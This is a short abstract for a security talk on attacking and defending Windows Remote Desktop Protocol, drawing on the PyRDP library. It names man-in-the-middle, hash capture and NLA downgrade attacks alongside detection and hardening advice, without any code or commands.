Remote Desktop Protocol (RDP) is the de facto standard for remote access in Windows environments. It grew in popularity over the last couple years due to the pandemic. Many workers are now relying on it to perform duties on remote systems. RDP is secure when well-deployed. Unfortunately, we’ve found that’s rarely the case and it’s common for users to ignore the security warnings.
GoSecure Titan Labs has spent three years working on and reimplementing parts of RDP in PyRDP, our open-source RDP library. This presentation shares what we have learned and how it can be applied to attack and defend against RDP threats.
From an attacker’s perspective, we will cover:
- Conventional RDP attacks such as Monster-in-the-Middle (MITM) for RDP connections
- Capture of NetNTLMv2 hashes
- Techniques to bypass conventional defense mechanisms such as Network Level Authentication (NLA)
Did you know that by default all clients allow server-side NLA downgrades right now? This will enable us to understand and identify the risks of RDP.
From a Blue Team / defender perspective, we will provide:
- Techniques and tools to detect attacks
- Step-by-step instructions to deploy an accessible RDP server that is both secure and functional